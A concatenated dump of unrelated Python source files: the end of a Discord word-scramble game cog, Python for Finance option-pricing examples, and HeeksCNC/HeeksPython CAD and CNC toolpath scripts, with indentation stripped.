def check_word(self, word, blanks, not_wrong_guess):
blanks = blanks.replace(' ', '')
if blanks != word:
not_wrong_guess = False
else:
not_wrong_guess = True
return not_wrong_guess
async def scramble_loop(self, ctx, word, not_finished, message_reactions, reaction_to_word, blanks, board, shuffled, not_wrong_guess):
while not_finished and not_wrong_guess:
def check(reaction, user):
return user == ctx.author and str(reaction.emoji) in message_reactions
try:
reaction, user = await self.bot.wait_for('reaction_add', timeout=60.0, check=check)
message = reaction.message
except asyncio.TimeoutError:
return await ctx.send(f"{ctx.author.mention}'s word was not guessed in time\nthe word was `{word}`")
else:
try:
await message.remove_reaction(reaction, user)
except:
pass
if reaction.emoji == STOP_EMOJI:
not_finished = False
return await board.edit(content = f"```Game ended...\nThe word was {word}```")
if reaction.emoji == WORD_EMOJI:
await board.edit(content = f"```Letters left: {' '.join(shuffled)}\nYou have 5 seconds to guess the word:```")
def check(m):
return m.author == ctx.author and m.channel == ctx.channel
try:
guess = await self.bot.wait_for('message', timeout=5.0, check=check)
if guess.content.lower() == word:
not_finished = False
blanks = " ".join(word)
break
else:
await ctx.send(f"Incorrect guess! You can try again by clicking {WORD_EMOJI} or you can just guess by reactions", delete_after=3.2)
except:
await ctx.send(f"You didn't guess in time! You can try again by clicking {WORD_EMOJI} or you can just guess by reactions", delete_after=3.2)
for char, emote in DICT_ALPHABET.items():
if char in shuffled:
if reaction.emoji == emote:
reaction_to_word += f"{char}"
blanks = blanks.replace(' ', '')
blanks = blanks[:len(reaction_to_word)-1] + char + blanks[len(reaction_to_word):]
blanks = " ".join(blanks)
shuffled = shuffled.replace(char, '', 1)
if reaction.emoji == BACK_EMOJI:
char = reaction_to_word[-1]
reaction_to_word = reaction_to_word[:-1]
blanks = blanks.replace(' ', '')
blanks = blanks[:len(reaction_to_word)] + '_' + blanks[len(reaction_to_word)+1:]
blanks = " ".join(blanks)
shuffled += char
if blanks.replace(' ', '') == word:
not_finished = False
if '_' not in blanks:
not_wrong_guess = self.check_word(word, blanks, not_wrong_guess)
await board.edit(content=f"```Letters left: {' '.join(shuffled)}\n{blanks}```")
if not not_wrong_guess:
await board.edit(
content=f'Wrong word foo lmao'
f'\n{user.mention} The word was "{word}"```\n{blanks}```')
if not not_finished:
await board.edit(content=f'{user.mention} has used the totality of their intellectual prowess and unscrambled the scrambled word'
f'\nThe word was "{word}"```\n{blanks}```')
return
def setup(bot):
bot.add_cog(Scramble(bot))
``` |
{
"source": "John-ye666/Python-for-Finance-Second-Edition",
"score": 3
} |
#### File: Python-for-Finance-Second-Edition/Chapter02/c2_09_bsCall.py
```python
def bsCall(S,X,T,r,sigma):
from scipy import log,exp,sqrt,stats
d1=(log(S/X)+(r+sigma*sigma/2.)*T)/(sigma*sqrt(T))
d2 = d1-sigma*sqrt(T)
return S*stats.norm.cdf(d1)-X*exp(-r*T)*stats.norm.cdf(d2)
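# A minimal usage sketch (illustrative values, not from the book): price a
# six-month at-the-money call with S=40, X=40, r=1% and sigma=20%. Note this
# relies on an older SciPy that still re-exports log/exp/sqrt.
# print(bsCall(40., 40., 0.5, 0.01, 0.2))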
```
#### File: Python-for-Finance-Second-Edition/Chapter08/c8_36_Fama_Mecbeth_regression.py
```python
import numpy as np
import pandas as pd
import statsmodels.api as sm
from datetime import datetime
#
n = 252
np.random.seed(12345)
begdate=datetime(2013, 1, 2)
dateRange = pd.date_range(begdate, periods=n)
def makeDataFrame():
data=pd.DataFrame(np.random.randn(n,7),columns=['A','B','C','D','E','F','G'],
index=dateRange)
return data
#
data = { 'A': makeDataFrame(), 'B': makeDataFrame(), 'C': makeDataFrame() }
Y = makeDataFrame()
print(pd.fama_macbeth(y=Y,x=data))
```
#### File: Python-for-Finance-Second-Edition/Chapter10/c10_13_fig.py
```python
from scipy import exp,sqrt,stats,arange,ones
from matplotlib import pyplot as plt
import numpy as np
z=0.325
def f(x):
return stats.norm.cdf(x)
x = arange(-3,3,0.1)
y1=f(x)
y2=ones(len(x))*0.5
x3=[0,0]
y3=[0,1]
plt.plot(x,y1)
plt.plot(x, y2, 'b-')
plt.plot(x3,y3)
plt.annotate('f(z)=f('+str(z)+') is '+str(np.round(f(z),4)),xy=(z,f(z)), xytext=(z-3,f(z)), arrowprops=dict(facecolor='red',shrink=0.01))
plt.annotate('z is '+str(z),xy=(z,0),xytext=(1.5,0.3), arrowprops=dict(facecolor='blue',shrink=0.01))
plt.show()
```
#### File: Python-for-Finance-Second-Edition/Chapter10/c10_22_binomial_graph.py
```python
import networkx as nx
import matplotlib.pyplot as plt
#
plt.figtext(0.08,0.6,"Stock price=$20")
plt.figtext(0.75,0.91,"Stock price=$22")
plt.figtext(0.75,0.87,"Option price=$1")
plt.figtext(0.75,0.28,"Stock price=$18")
plt.figtext(0.75,0.24,"Option price=0")
n=1
def binomial_grid(n):
G=nx.Graph()
for i in range(0,n+1):
for j in range(1,i+2):
if i<n:
G.add_edge((i,j),(i+1,j))
G.add_edge((i,j),(i+1,j+1))
posG={}
for node in G.nodes():
posG[node]=(node[0],n+2+node[0]-2*node[1])
nx.draw(G,pos=posG)
binomial_grid(n)
plt.show()
```
#### File: Python-for-Finance-Second-Edition/Chapter10/c10_33_implied_vol_EuropeanPut_min.py
```python
from scipy import log,exp,sqrt,stats
def implied_vol_put_min(S,X,T,r,p):
implied_vol=1.0
min_value=100.0
for i in xrange(1,10000):
sigma=0.0001*(i+1)
d1=(log(S/X)+(r+sigma*sigma/2.)*T)/(sigma*sqrt(T))
d2 = d1-sigma*sqrt(T)
put=X*exp(-r*T)*stats.norm.cdf(-d2)-S*stats.norm.cdf(-d1)
abs_diff=abs(put-p)
if abs_diff<min_value:
min_value=abs_diff
implied_vol=sigma
k=i
put_out=put
print 'k, implied_vol, put, abs_diff'
return k,implied_vol, put_out,min_value
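# A minimal usage sketch (illustrative values, not from the book); the grid
# search returns the iteration index, the implied volatility, the model put
# price and the remaining absolute pricing error:
# print implied_vol_put_min(40., 40., 0.5, 0.05, 1.77)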
```
#### File: Python-for-Finance-Second-Edition/Chapter10/c10_39_implied_vol_binary_search.py
```python
from scipy import log,exp,sqrt,stats
S=42;X=40;T=0.5;r=0.01;c=3.0
def bsCall(S,X,T,r,sigma):
d1=(log(S/X)+(r+sigma*sigma/2.)*T)/(sigma*sqrt(T))
d2 = d1-sigma*sqrt(T)
return S*stats.norm.cdf(d1)-X*exp(-r*T)*stats.norm.cdf(d2)
#
def impliedVolBinary(S,X,T,r,c):
k=1
volLow=0.001
volHigh=1.0
cLow=bsCall(S,X,T,r,volLow)
cHigh=bsCall(S,X,T,r,volHigh)
if cLow>c or cHigh<c:
raise ValueError
while k ==1:
cLow=bsCall(S,X,T,r,volLow)
cHigh=bsCall(S,X,T,r,volHigh)
volMid=(volLow+volHigh)/2.0
cMid=bsCall(S,X,T,r,volMid)
if abs(cHigh-cLow)<0.01:
k=2
elif cMid>c:
volHigh=volMid
else:
volLow=volMid
return volMid, cLow, cHigh
#
print("Vol, cLow, cHigh")
print(impliedVolBinary(S,X,T,r,c))
```
#### File: Python-for-Finance-Second-Edition/Chapter14/c14_06_binary_call.py
```python
import random
import scipy as sp
#
def terminalStockPrice(S, T,r,sigma):
tao=random.gauss(0,1.0)
terminalPrice=S * sp.exp((r - 0.5 * sigma**2)*T+sigma*sp.sqrt(T)*tao)
return terminalPrice
#
def binaryCallPayoff(x, sT,payoff):
if sT >= x:
return payoff
else:
return 0.0
# input area
S = 40.0 # asset price
x = 40.0 # exericse price
T = 0.5 # maturity in years
r = 0.01 # risk-free rate
sigma = 0.2 # vol of 20%
fixedPayoff = 10.0 # payoff
nSimulations =10000 # number of simulatins
#
payoffs=0.0
for i in xrange(nSimulations):
sT = terminalStockPrice(S, T,r,sigma)
payoffs += binaryCallPayoff(x, sT,fixedPayoff)
#
price = sp.exp(-r * T) * (payoffs / float(nSimulations))
print('Binary options call= %.8f' % price)
```
#### File: Python-for-Finance-Second-Edition/Chapter14/c14_18_down_and_in_put.py
```python
import scipy as sp
import p4f  # the book's helper module, assumed to provide bs_put()

def down_and_in_put(s0,x,T,r,sigma,n_simulation,barrier):
n_steps=100.
dt=T/n_steps
total=0
for j in range(0, n_simulation):
sT=s0
in_=False
for i in range(0,int(n_steps)):
e=sp.random.normal()
sT*=sp.exp((r-0.5*sigma*sigma)*dt+sigma*e*sp.sqrt(dt))
if sT<barrier:
in_=True
#print 'sT=',sT
#print 'j=',j ,'out=',out
if in_==True:
    total+=p4f.bs_put(s0,x,T,r,sigma)
return total/n_simulation
#
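# A minimal usage sketch (illustrative values, not from the book): value a
# down-and-in put with spot 40, strike 40, half a year to maturity, a 5% rate,
# 20% volatility, 100 simulated paths and a barrier at 38:
# print(down_and_in_put(40., 40., 0.5, 0.05, 0.2, 100, 38.))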
```
#### File: Python-for-Finance-Second-Edition/Chapter15/c15_07_equal_vol_2periods.py
```python
import numpy as np
import scipy as sp
import pandas as pd
from matplotlib.finance import quotes_historical_yahoo_ochl as getData
#
# input area
ticker='F' # stock
begdate1=(1982,9,1) # starting date for period 1
enddate1=(1987,9,1) # ending date for period 1
begdate2=(1987,12,1) # starting date for period 2
enddate2=(1992,12,1) # ending date for period 2
#
# define a function
def ret_f(ticker,begdate,enddate):
p =getData(ticker, begdate, enddate,asobject=True, adjusted=True)
ret = p.aclose[1:]/p.aclose[:-1]-1
date_=p.date
return pd.DataFrame(data=ret,index=date_[1:],columns=['ret'])
#
# call the above function twice
ret1=ret_f(ticker,begdate1,enddate1)
ret2=ret_f(ticker,begdate2,enddate2)
#
# output
print('Std period #1 vs. std period #2')
print(round(sp.std(ret1.ret),6),round(sp.std(ret2.ret),6))
print('T value , p-value ')
print(sp.stats.bartlett(ret1.ret,ret2.ret))
``` |
{
"source": "JohnyEngine/CNC",
"score": 3
} |
#### File: heekspython/examples/dxf_to_heekspython.py
```python
import math
##########################
#
# parse the dxf file
#
##########################
def _parsepair(a):
"""Parse a pair of lines containing 'group code' and 'value'."""
groupcode = a.next().strip()
value = a.next().strip()
return (groupcode, value)
def _gotosection(a, secname):
"""Go to secname and stop."""
while 1:
gc, val = _parsepair(a)
if gc == '2' and val == secname:
return
def _get_units(a):
"""Parse through HEADER section and detect whether units
are set for metric(1) or english(0)."""
_gotosection(a, 'HEADER')
units = 0 # assume inches by default
while 1:
gc, val = _parsepair(a)
if gc == '9' and val == '$MEASUREMENT':
gc, val = _parsepair(a)
if gc == '70':
units = int(val)
elif gc == '0' and val == 'ENDSEC':
return units
def _process_entity(a):
"""Return a dictionary of groupcodes : values for the next
entity in the ENTITIES section. Go until groupcode == 0."""
entitydict = {}
flag = 1
while 1:
gc, val = _parsepair(a)
if gc == '0':
if val == 'ENDSEC':
flag = 0 # Done with ENTITIES section
return (entitydict, flag, val)
else:
entitydict[gc] = val
def _parse_file(f):
"""Parse contents of the dxf file, looking for units and
all the drawing entities."""
a = iter(open(f))
units = _get_units(a)
_gotosection(a, 'ENTITIES')
lines = []
circles = []
arcs = []
entities = [lines, circles, arcs]
gc, val = _parsepair(a)
while 1:
if val == 'LINE':
ed, f, val = _process_entity(a)
lines.append(ed)
#print 'line\n'
elif val == 'CIRCLE':
ed, f, val = _process_entity(a)
circles.append(ed)
#print 'circle\n'
elif val == 'ARC':
ed, f, val = _process_entity(a)
arcs.append(ed)
#print 'arc\n'
else:
ed, f, val = _process_entity(a)
if not f:
return (units, entities)
##########################
#
# dxf to HeeksPython
# DF added 10/31/10
##########################
def gen_heekspython_entities(f,sketch_num):
"""Generate HeeksPython objects from dxf entities."""
units, entities = _parse_file(f)
lines, circles, arcs = entities
if units:
scale = 1.0
else:
scale = 25.4
mldict = {}
mcdict = {}
madict = {}
k = 0
i = 0
collector=[]
collector.append("cad.sketch()\n")
collector.append("sketch"+str(sketch_num)+" = cad.getlastobj()\n")
for line in lines:
p1 = (float(line['10'])*scale,
float(line['20'])*scale)
p2 = (float(line['11'])*scale,
float(line['21'])*scale)
coords = (p1, p2)
#print"#Line,"+str(p1[0])+","+str(p1[1])+",0,"+str(p2[0])+","+str(p2[1])+",0\n"
collector.append("cad.line("+str(p1[0])+","+str(p1[1])+","+str(p2[0])+","+str(p2[1])+")\n")
collector.append("i"+str(i)+"= cad.getlastobj()\n")
collector.append("cad.add(sketch"+str(sketch_num)+",i"+str(i)+")\n")
i+=1
k+=1
mldict[k] = coords
string = "".join(collector)
k = 0
for circ in circles:
cntr = (float(circ['10'])*scale,
float(circ['20'])*scale)
radius = float(circ['40'])*scale
coords = (cntr, radius)
#print "#Circle,"+str(cntr[0])+","+str(cntr[1])+",0,"+str(radius)+"\n"
collector.append("cad.circle("+str(cntr[0])+","+str(cntr[1])+","+str(radius)+")\n")
collector.append("i"+str(i)+"= cad.getlastobj()\n")
collector.append("cad.add(sketch"+str(sketch_num)+",i"+str(i)+")\n")
i+=1
k+=1
mcdict[k] = coords
string = "".join(collector)
k = 0
for arc in arcs:
cntr = (float(arc['10'])*scale,
float(arc['20'])*scale)
radius = float(arc['40'])*scale
a0 = float(arc['50'])
a1 = float(arc['51'])
coords = (cntr, radius, a0, a1)
angle1=((math.pi)/180)*a0
angle2=((math.pi)/180)*a1
#print "#Arc,"+str(cntr[0])+","+str(cntr[1])+",0,"+str(radius)+","+str(angle1)+","+str(angle2)+"\n"
collector.append("cad.arc("+str(cntr[0])+","+str(cntr[1])+",0,"+str(radius)+","+str(angle1)+","+str(angle2)+",0,0,1)\n")
# hard-coded direction vector; the start/end angles were converted to radians above
collector.append("i"+str(i)+"= cad.getlastobj()\n")
collector.append("cad.add(sketch"+str(sketch_num)+",i"+str(i)+")\n")
i+=1
k+=1
madict[k] = coords
string = "".join(collector)
string= string + "cad.reorder(sketch"+str(sketch_num)+")\n"
#string= string + "cad.revolve(sketch,360)"
return string
#example of how to use it
'''
import HeeksPython as cad
import sys
sys.path.insert(0,'/home/dan/heeks/heekspython2/examples')
import dxf_to_heekspython
file_in='/home/dan/Documents/drawings/blob.dxf'
l = dxf_to_heekspython.gen_heekspython_entities(file_in,1)
exec(l)
or scale the object/sketch like this:
l = dxf_to_heekspython.gen_heekspython_entities(file_in,1)
l = l +"cad.scale(sketch1,0,0,0,.25)"
exec(l)
or even revolve a solid after returning l
l = dxf_to_heekspython.gen_heekspython_entities(file_in,1)
l = l +"cad.revolve(sketch1,360)"
exec(l)
'''
```
#### File: heekspython/examples/polar_array.py
```python
import HeeksPython as cad
import math
import wx
# begin wxGlade: extracode
# end wxGlade
class MyFrame(wx.Frame):
def __init__(self, *args, **kwds):
# begin wxGlade: MyFrame.__init__
kwds["style"] = wx.DEFAULT_FRAME_STYLE
wx.Frame.__init__(self, *args, **kwds)
self.x_center_label = wx.StaticText(self, -1, "X center")
self.x_center_entry = wx.TextCtrl(self, -1, "")
self.y_center_label = wx.StaticText(self, -1, "Y center")
self.y_center_entry = wx.TextCtrl(self, -1, "")
self.z_center_label = wx.StaticText(self, -1, "Z center")
self.z_center_entry = wx.TextCtrl(self, -1, "")
self.number_points_label = wx.StaticText(self, -1, "Number of Points")
self.no_of_holes_entry = wx.TextCtrl(self, -1, "")
self.diameter_label = wx.StaticText(self, -1, "Polar Array Diameter")
self.bolt_circle_diameter_entry = wx.TextCtrl(self, -1, "")
self.angle_label = wx.StaticText(self, -1, "Starting Angle")
self.start_angle_entry = wx.TextCtrl(self, -1, "")
self.scale_label = wx.StaticText(self, -1, "Scale")
self.Scale_entry = wx.TextCtrl(self, -1, "")
self.GenButton = wx.Button(self, -1, "Generate Points")
self.quit = wx.Button(self, -1, "Close")
self.__set_properties()
self.__do_layout()
self.Bind(wx.EVT_BUTTON, self.GenCode, self.GenButton)
self.Bind(wx.EVT_BUTTON, self.OnCloseMe, self.quit)
# end wxGlade
def __set_properties(self):
# begin wxGlade: MyFrame.__set_properties
self.SetTitle("Generate Polar Array of Points")
# end wxGlade
def __do_layout(self):
# begin wxGlade: MyFrame.__do_layout
grid_sizer_1 = wx.GridSizer(9, 2, 0, 0)
grid_sizer_1.Add(self.x_center_label, 0, wx.ALIGN_RIGHT, 0)
grid_sizer_1.Add(self.x_center_entry, 0, 0, 0)
grid_sizer_1.Add(self.y_center_label, 0, wx.ALIGN_RIGHT, 0)
grid_sizer_1.Add(self.y_center_entry, 0, 0, 0)
grid_sizer_1.Add(self.z_center_label, 0, wx.ALIGN_RIGHT, 0)
grid_sizer_1.Add(self.z_center_entry, 0, 0, 0)
grid_sizer_1.Add(self.number_points_label, 0, wx.ALIGN_RIGHT, 0)
grid_sizer_1.Add(self.no_of_holes_entry, 0, 0, 0)
grid_sizer_1.Add(self.diameter_label, 0, wx.ALIGN_RIGHT, 0)
grid_sizer_1.Add(self.bolt_circle_diameter_entry, 0, 0, 0)
grid_sizer_1.Add(self.angle_label, 0, wx.ALIGN_RIGHT, 0)
grid_sizer_1.Add(self.start_angle_entry, 0, 0, 0)
grid_sizer_1.Add(self.scale_label, 0, wx.ALIGN_RIGHT, 0)
grid_sizer_1.Add(self.Scale_entry, 0, 0, 0)
grid_sizer_1.Add(self.GenButton, 0, 0, 0)
grid_sizer_1.Add(self.quit, 0, 0, 0)
self.SetSizer(grid_sizer_1)
grid_sizer_1.Fit(self)
self.Layout()
# end wxGlade
def OnCloseMe(self, event): # wxGlade: MyFrame.<event_handler>
print "We're Done!!!!!"
self.Destroy()
def GenCode(self, event): # wxGlade: MyFrame.<event_handler>
cad.sketch()
sketch = cad.getlastobj()
x_center=float(self.x_center_entry.GetValue())
y_center=float(self.y_center_entry.GetValue())
z_center=float(self.z_center_entry.GetValue())
no_of_holes=float(self.no_of_holes_entry.GetValue())
bolt_circle_diameter=float(self.bolt_circle_diameter_entry.GetValue())
start_angle=float(self.start_angle_entry.GetValue())
scale=float(self.Scale_entry.GetValue())
count = 0
anglecount=1
circle_division_angle=(360/no_of_holes)
calc_angle=start_angle
while (count < no_of_holes):
x1=math.cos(math.radians(calc_angle))*(bolt_circle_diameter/2)
y1=math.sin(math.radians(calc_angle))*(bolt_circle_diameter/2)
x=(x1+x_center)*scale
y=(y1+y_center)*scale
z=(z_center)*scale
cad.point(x,y,z)
cad.add(sketch,cad.getlastobj())
data=str('X%.4f Y%.4f Z%.4f '% (x, y, z)+'\n')
print data
anglecount=anglecount+1
calc_angle=calc_angle + circle_division_angle
count=count+1
cad.reorder(sketch);
return sketch
# end of class MyFrame
#we don't need the next section of code- it would crash Heeks
'''if __name__ == "__main__":
app = wx.PySimpleApp(0)
wx.InitAllImageHandlers()
frame_1 = MyFrame(None, -1, "")
app.SetTopWindow(frame_1)
frame_1.Show()
app.MainLoop()'''
```
#### File: freesteel/test/garston.py
```python
from FreesteelPython import *
import FreesteelWindow
import sys
import postprocessor
#from postprocessor import postprocess
from coreRough import coreRough
def makeRectBoundary(sx):
bdy = PathXSeries()
bdy.Add(P2(sx.gxrg.lo, sx.gyrg.lo))
bdy.Add(P2(sx.gxrg.hi, sx.gyrg.lo))
bdy.Add(P2(sx.gxrg.hi, sx.gyrg.hi))
bdy.Add(P2(sx.gxrg.lo, sx.gyrg.hi))
bdy.Add(P2(sx.gxrg.lo, sx.gyrg.lo))
bdy.z = sx.gzrg.hi + 5
bdy.Break()
return bdy
def makeParams(stepdown=15.0, toolcornerrad=3.0, toolflatrad=0.0, retractheight=50.0):
params = MachineParams()
# linking parameters
params.leadoffdz = 0.1
params.leadofflen = 1.1
params.leadoffrad = 2.0
params.retractzheight = retractheight
params.leadoffsamplestep = 0.6
# cutting parameters
params.toolcornerrad = toolcornerrad
params.toolflatrad = toolflatrad
params.samplestep = 0.4
params.stepdown = stepdown
params.clearcuspheight = params.stepdown / 3.0
# weave parameters
params.triangleweaveres = 0.51
params.flatradweaveres = 0.71
# steering parameters
# fixed values controlling the step-forward of the tool and
# changes of direction.
params.dchangright = 0.17
params.dchangrightoncontour = 0.37
params.dchangleft = -0.41
params.dchangefreespace = -0.6
params.sidecutdisplch = 0.0
params.fcut = 1000
params.fretract = 5000
params.thintol = 0.0001
return params
mainframe = FreesteelWindow.MainFrame()
vtkwindow = mainframe.vtkwindow
surfhandle = vtkwindow.LoadSTL("mm.stl")
vtkwindow.showAll() # zoom to fit
surfx = SurfX()
vtkwindow.PushTrianglesIntoSurface(surfhandle, surfx)
surfx.BuildComponents()
boundary = makeRectBoundary(surfx)
vtkwindow.addPathxSeries(boundary)
vtkwindow.render()
params = makeParams()
params.retractheight = surfx.gzrg.hi + 2
z = surfx.gzrg.lo + 2
pathx = PathXSeries()
coreRough(pathx, surfx, boundary, params, z)
vtkwindow.addPathxSeries(pathx)
pathx2 = pathx
z = surfx.gzrg.lo + 20
coreRough(pathx2, surfx, boundary, params, z)
vtkwindow.addPathxSeries(pathx2)
vtkwindow.render()
# send to post processor
postprocessor.postprocess(pathx, "ghgh.tap")
if ('interactive' not in sys.argv):
# Running mainloop. Run interactively (-i) with argument 'interactive' to access the interactive console.
mainframe.mainloop()
```
#### File: freesteel/test/postprocessor.py
```python
from FreesteelPython import *
import FreesteelWindow
import sys
import string
class pp:
def __init__(self):
self.lx0 = ""
self.ly0 = ""
self.lz0 = ""
def writeheading(self, fout):
fout.write("BEGINPGM\n")
fout.write("LOADTL1\n")
def writeline(self, fout, x, y, z):
res = [ 'L' ]
sx = "X%.3f" % x
if sx != self.lx0:
res.append(sx)
self.lx0 = sx
sy = "Y%.3f" % y
if sy != self.ly0:
res.append(sy)
self.ly0 = sy
sz = "Z%.3f" % z
if sz != self.lz0:
res.append(sz)
self.lz0 = sz
if len(res) > 1:
res.append('\n')
fout.write(string.join(res, ''))
def writePath(self, fout, pathx):
j = 0
restart = 1
for i in xrange(pathx.GetNpts()):
if (j == pathx.GetNbrks()) or (i < pathx.GetBrkIndex(j)):
if restart == 1:
fout.write("//////// Begin new path ///////\n")
self.writeline(fout, pathx.GetX(i - 1), pathx.GetY(i - 1), pathx.z)
restart = 0
self.writeline(fout, pathx.GetX(i), pathx.GetY(i), pathx.z)
else:
while (j < pathx.GetNbrks()) and (i == pathx.GetBrkIndex(j)):
if pathx.GetNlnks(j) > 0:
restart = 1
fout.write("//////// Begin new link ///////\n")
for il in xrange(pathx.GetNlnks(j)):
self.writeline(fout, pathx.GetLinkX(j, il), pathx.GetLinkY(j, il), pathx.GetLinkZ(j, il))
j = j + 1
def postprocess(pathx, fname):
lpp = pp()
fout = open(fname, "w")
lpp.writeheading(fout)
fout.write("G0\n")
lpp.writePath(fout, pathx)
#for i in xrange(pathx.GetNpts()):
# lpp.writeline(fout, pathx.GetX(i), pathx.GetY(i), pathx.z)
fout.write("ENDPGM\n")
fout.close()
```
#### File: heekscnc/nc/centroid1_read.py
```python
import iso_read as iso
import sys
# just use the iso reader
class Parser(iso.Parser):
def __init__(self, writer):
iso.Parser.__init__(self, writer)
```
#### File: heekscnc/nc/DeckelFP4Ma.py
```python
import nc
import iso
import math
import datetime
import time
from format import Format
now = datetime.datetime.now()
class Creator(iso.Creator):
def __init__(self):
iso.Creator.__init__(self)
self.output_tool_definitions = False
self.fmt = Format(dp_wanted = False, add_trailing_zeros = True, add_plus = True)
def SPACE_STR(self): return ' '
def PROGRAM(self): return None
def PROGRAM_END(self): return( 'T0' + self.SPACE() + 'M06' + self.SPACE() + 'M02')
############################################################################
## Begin Program
def program_begin(self, id, comment):
self.write( ('(Created with Deckel FP4Ma post processor ' + str(now.strftime("%Y/%m/%d %H:%M")) + ')' + '\n') )
iso.Creator.program_begin(self, id, comment)
nc.creator = Creator()
```
#### File: heekscnc/nc/hpgl3d_read.py
```python
import num_reader
import sys
import math
class Parser(num_reader.NumReader):
def __init__(self, writer):
num_reader.NumReader.__init__(self, writer)
self.x = 0
self.y = 0
self.z = 10000
self.f = 0
self.units_to_mm = 0.01
def ParseV(self):
self.line_index = self.line_index + 1
f = self.get_number()
if len(f) > 0:
self.f = float(f)
self.add_word("prep")
def ParseZ(self):
self.line_index = self.line_index + 1
x = self.get_number()
if len(x) > 0:
y = self.get_number()
if len(y) > 0:
z = self.get_number()
if len(z) > 0:
if self.f > 40: color = "rapid"
else: color = "feed"
self.add_word(color)
self.writer.begin_path(color)
self.writer.add_line(int(x) * self.units_to_mm, int(y) * self.units_to_mm, int(z) * self.units_to_mm)
self.writer.end_path()
self.x = int(x)
self.y = int(y)
self.z = int(z)
def ParseFromFirstLetter(self, c):
if c == 'Z':
self.ParseZ()
elif c == 'V':
self.ParseV()
```
#### File: heekscnc/pycnc/NoCad.py
```python
import sys
import getopt
from Cad import Cad
import HeeksCNC
import wx
import wx.aui
# this is an example of how to plugin HeeksCNC into a cad system
# here we make a wxWidgets application with a menu to represent the CAD system
class NoCad(Cad):
def __init__(self):
self.current_profile_dxf = []
Cad.__init__(self)
try:
opts, args = getopt.getopt(sys.argv[1:], "h", ["help"])
except getopt.error, msg:
print msg
print "for help use --help"
sys.exit(2)
# process options
for o, a in opts:
if o in ("-h", "--help"):
print __doc__
sys.exit(0)
# process arguments
for arg in args:
self.current_profile_dxf.append('"')
self.current_profile_dxf.append(arg)
self.current_profile_dxf.append('" ')
#self.current_profile_dxf = arg # process() is defined elsewhere
# make a wxWidgets application
self.frame= wx.Frame(None, -1, 'CAM ( Computer Aided Manufacturing ) from DXF files')
self.menubar = wx.MenuBar()
self.frame.Bind(wx.EVT_MENU_RANGE, self.OnMenu, id=100, id2=1000)
self.menu_map = {}
self.next_menu_id = 100
self.aui_manager = wx.aui.AuiManager()
self.aui_manager.SetManagedWindow(self.frame)
def OnMenu(self, event):
callback = self.menu_map[event.GetId()]
callback()
def OnMenuOpen(self):
pass
def add_menu_item(self, menu, label, callback, icon = None):
item = wx.MenuItem(menu, self.next_menu_id, label)
self.menu_map[self.next_menu_id] = callback
self.next_menu_id = self.next_menu_id + 1
menu.AppendItem(item)
def addmenu(self, name):
menu = wx.Menu()
self.menubar.Append(menu, name)
return menu
def add_window(self, window):
self.aui_manager.AddPane(window, wx.aui.AuiPaneInfo().Name(window.GetLabel()).Caption(window.GetLabel()).Center())
def get_frame_hwnd(self):
return self.frame.GetHandle()
def get_frame_id(self):
return self.frame.GetId()
def on_new_or_open(self, open, res):
if open == 0:
pass
else:
pass
def on_start(self):
pass
def get_view_units(self):
return 1.0
def get_selected_sketches(self):
return self.current_profile_dxf
def hide_window_on_pick_sketches(self):
return False
def pick_sketches(self):
# returns a list of strings, one name for each sketch
str_sketches = []
# open dxf file
dialog = wx.FileDialog(HeeksCNC.frame, "Choose sketch DXF file", wildcard = "DXF files" + " |*.dxf")
dialog.CentreOnParent()
if dialog.ShowModal() == wx.ID_OK:
str_sketches.append(dialog.GetPath())
return str_sketches
def repaint(self):
# repaints the CAD system
#heekscad.redraw()
pass
def GetFileFullPath(self):
return None
def WriteAreaToProgram(self, sketches):
HeeksCNC.program.python_program += "a = area.Area()\n"
for sketch in sketches:
HeeksCNC.program.python_program += 'sub_a = area.AreaFromDxf("' + sketch + '")\n'
HeeksCNC.program.python_program += "for curve in sub_a.getCurves():\n"
HeeksCNC.program.python_program += " a.append(curve)\n"
HeeksCNC.program.python_program += "\n"
def main():
app = wx.App()
nocad = NoCad()
HeeksCNC.cad = nocad
HeeksCNC.start()
nocad.frame.SetMenuBar(nocad.menubar)
nocad.frame.Center()
nocad.aui_manager.Update()
nocad.frame.Show()
app.MainLoop()
if __name__ == '__main__':
main()
```
#### File: opencamlib/scripts/edge_offset_tst_1.py
```python
import ocl
import pyocl
import camvtk
import time
import vtk
import datetime
import math
def drawEdge(myscreen, a, b):
myscreen.addActor(camvtk.Sphere(center=(a.x,a.y,a.z), radius=0.0351, color=camvtk.green));
myscreen.addActor(camvtk.Sphere(center=(b.x,b.y,b.z), radius=0.0351, color=camvtk.red));
myscreen.addActor( camvtk.Line(p1=(a.x,a.y,a.z),p2=(b.x,b.y,b.z)) )
if __name__ == "__main__":
print ocl.version()
myscreen = camvtk.VTKScreen()
camvtk.drawOCLtext(myscreen)
camvtk.drawArrows(myscreen,center=(-1,-2,0))
a=ocl.Point(0,1.7,-0.6)
b=ocl.Point(0,0.11,0.3)
drawEdge(myscreen, a, b)
diameter=0.4
length=1
# spherical cutter and cylinder
s1 = camvtk.Sphere(center=(a.x,a.y,a.z), radius=diameter/2, color=camvtk.lgreen)
s2 = camvtk.Sphere(center=(b.x,b.y,b.z), radius=diameter/2, color=camvtk.pink)
s1.SetOpacity(1)
s2.SetOpacity(1)
myscreen.addActor(s1)
myscreen.addActor(s2)
# tube
cyltube = camvtk.Tube( p1=(a.x,a.y,a.z) , p2=(b.x,b.y,b.z), radius=diameter/2, color=camvtk.yellow )
cyltube.SetOpacity(0.2)
myscreen.addActor( cyltube )
# Cylinder
a = a + ocl.Point(1,0,0)
b = b + ocl.Point(1,0,0)
drawEdge(myscreen, a, b)
cir1 = camvtk.Circle(center=(a.x,a.y,a.z) , radius=diameter/2, color=camvtk.lgreen, resolution=50 )
cir1.SetOpacity(1)
myscreen.addActor(cir1)
cir2 = camvtk.Circle(center=(b.x,b.y,b.z) , radius=diameter/2, color=camvtk.pink, resolution=50 )
cir2.SetOpacity(1)
myscreen.addActor(cir2)
# draw lines along the elliptic tube
# Toroid
a = a + ocl.Point(1,0,0)
b = b + ocl.Point(1,0,0)
drawEdge(myscreen, a, b)
tor1 = camvtk.Toroid(r1=diameter/2, r2=diameter/6, center=(a.x,a.y,a.z), rotXYZ=(0,0,0), color=camvtk.lgreen)
tor1.SetOpacity(1)
myscreen.addActor(tor1)
tor2 = camvtk.Toroid(r1=diameter/2, r2=diameter/6, center=(b.x,b.y,b.z), rotXYZ=(0,0,0), color=camvtk.pink)
tor2.SetOpacity(1)
myscreen.addActor(tor2)
# Cone
a = a + ocl.Point(1,0,0)
b = b + ocl.Point(1,0,0)
drawEdge(myscreen, a, b)
